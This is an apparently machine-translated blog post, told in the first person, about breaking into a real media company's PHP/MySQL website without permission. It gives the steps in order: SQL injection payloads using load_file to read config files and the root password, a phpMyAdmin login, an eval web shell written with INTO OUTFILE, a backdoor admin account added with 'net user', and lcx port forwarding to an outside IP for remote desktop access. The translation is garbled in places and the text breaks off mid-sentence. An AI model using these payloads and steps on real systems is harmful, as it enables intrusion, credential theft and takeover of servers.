Detection of friendship on the website of an airline media operator)

When I was engaged in a foreign website this afternoon, I asked me if I was interested in PHP injection. I had a lot of experience in PHP injection, so I had a rare opportunity to practice, then I agreed to Xiao Han, injected some information to me, and told me that it was the root permission. I 'd like to hear this. I may still be able to escalate the Right to the service if I have the root permission !!

I opened the website and looked at it. I found it was a media company. Then I directly used the injection point load_file to read the file and went straight to the MYSQL account and password. Since I knew it was the root permission, the root password does not need to be used to identify the background. Because it is an injection point, it must first be the load_file file that has been injected. Because this file has performed database operations, it must be connected to the database. We all know that in a website system, all the links to the database are put in a file, and then include the file on the page that needs to connect to the database for database operations.

Previously, Xiao Han reported that the website path is D: APMServAPMServ5.2.6wwwhtdocs. The current injection page is D: inject _ detil. php and is converted to hex. Submit:/prod_detil.php? Infoid = 29 and 1 = 2 union select 1, 2, 4, 5, load_file (values

756374735c70116f645f646574696c2e706870

The source code of the page is directly exposed. Sometimes, when you use the load_file function to read files, it will be blank. In this case, you can view the source code of the webpage to see the content, however, only part of the source code can be displayed here. I used the substring function in order to see more and more functions. This is taught by handsome in the previous group, using substring (load_file (hex ), 2,800) is used to intercept the content of the laod_file file between 2nd characters and 800 characters. Continue to submit:/prod_detil.php? Infoid = 29 and 1 = 2 union select 1, 2, 3, 4, 5, substring (load_file (Parts

374735c70213f645f646574696c2e706870

This time, we can see the content in the front of the page. Generally, the file code is written in the front of the page. Here, we can see that the front part of the page contains a global. inc. the php file is located in the upper-level Directory, which is both: D: APMServAPMServ5.2.6wwwhtdocsglobal. inc. php, convert it to hex, and then submit load:/prod_detil.php? Infoid = 29 and 1 = 2 union select 1, 2, 3, 4, 5, substring (load_file (Parts

C6F62616C5F696E632E706870

After expanding the substring function range, you can see the database link comments in the file, followed by the path of the database link file: D: APMServAPMServ5.2.6wwwhtdocsadminincconn. php, Convert hex to continue submission:/prod_detil.php? Infoid = 29 and 1 = 2 union select 1, 2, 3, 4, 5, substring (load_file (Parts

6D696E5C696E635C636F6E6E2E706870

This time the root password broke. Now, with the root password, you can remotely connect to the MYSQL database on the server and export a sentence to the website directory, I tried to directly into outfile when I checked this site, but the magic conversion was turned on and failed. The only way was to get the root password for remote connection and execute export, in the mysql command prompt, magic conversion is useless, which is only for website programs. However, a problem occurred during remote connection.

It seems that MYSQL has disabled remote connection, and the entire process is in trouble, and the database has disabled remote connection. Is it impossible to use root to export a sentence? When I calmed down, I suddenly thought that php had a phpmyadmin? Do you have any idea about this site? So I added a phpmyadmin path to the URL with a try.

 

It seems that the character is quite good. I directly logged on with the root password. Now I have phpmyadmin background management and the login account is still root, so here we can still get a trojan file everywhere under the root directory of the website, and then we will use the command to continue MYSQL.

Select version ();

Show databases;

Create database tst;

Use tst;

Create table cmd (c text );

Insert into cmd values (<? Php eval ($ _ POST [cmd])?> );

Select * from cmd into outfile D: \ APMServ \ APMServ5.2.6 \ www \ htdocs \ test. php;

Drop database tst;

Exit

D: \ APMServ \ APMServ5.2.6 \ www \ htdocs \ test. php is the exported path. In the phpmyadmin background, select a database and execute the SQL statement.

 

Although an error is prompted, test. the php file is still honestly exported to the root directory of the website, followed by a php client connection to upload webshell. I won the webshell on this website, however, a problem occurred while raising the permission later. The server's permissions were not obtained yet. At that time, mysql backdoor was used to export the dll file successfully, but the command could not be executed, in addition, the attacker has been killed by a tool. It seems that the server's removal software is relatively powerful. However, we can see that the directory permission on the server is very large, and the system32 directory has the write permission, haha. I think the server's permission escalation should be okay. I haven't done it for the time being. I will write this process first, and then I will do it slowly.

I have no experience in injecting php + mysql. I have little experience at all. The technical content in this article is not high. I wrote this article for many cainiao friends, the method is relatively simple, and I hope cainiao can understand it.

========================================================== ==========================================

Preface:

After winning webshell in the afternoon, I wrote an article and sent it out. After something went out, I came back to the computer at night and thought of this station. I'm sorry that I didn't get the server because of my root permission, so I checked webshell again.

 

This is when MYSQL is used to use the tool. The dll file is exported but cannot be opened. I don't know the specific reason. I only took this offer for MYSQL with the most Elevation of Privilege. When I found that I couldn't use it, I suddenly had no other ideas. When I came back to shell at night, I suddenly remembered that my system32 directory had the write permission? The startup directory of the administrator account can also be written. In this way, I can write a ratio processing or a VBS script to escalate the permission, so I tested the following to c: documents and SettingsAdministrator "start" Menu \ Program startup directory to write a file, and found that the file can be written. Now the idea of elevation of permission is available, you can write batch processing and VBS scripts in this directory to escalate permissions. But what should I do with this batch processing or VBS? Because the current server information is still incomplete, especially the terminal situation, and the server may still be an intranet.

Considering this problem, I still need to find a way to first understand the network environment and terminal conditions of the server to write the Privilege Escalation script in a targeted manner, then a cmd is passed to the server and shell is executed to check the server information. It is found that the server is actually an intranet, but the terminal port is open.

However, while executing the server information query command, I also tested the command for adding an account, unexpectedly, after executing the net user invader 123456/add command, the system prompts me that the command is successfully completed...

This is really enough. I recently encountered a situation where asp shell directly added users. This is the first time that php shell directly added users, it seems that the shell permission is not generally large. Then execute lcx-listen 3380 3381 on an internet server, and then execute c: lcx.exe-slave 203.171.232.197 3380 10.10.254.100 3389 on the server. After the execution, the webshell is suspended, the execution was successful based on experience, and then the remote terminal was connected to 203.171.2.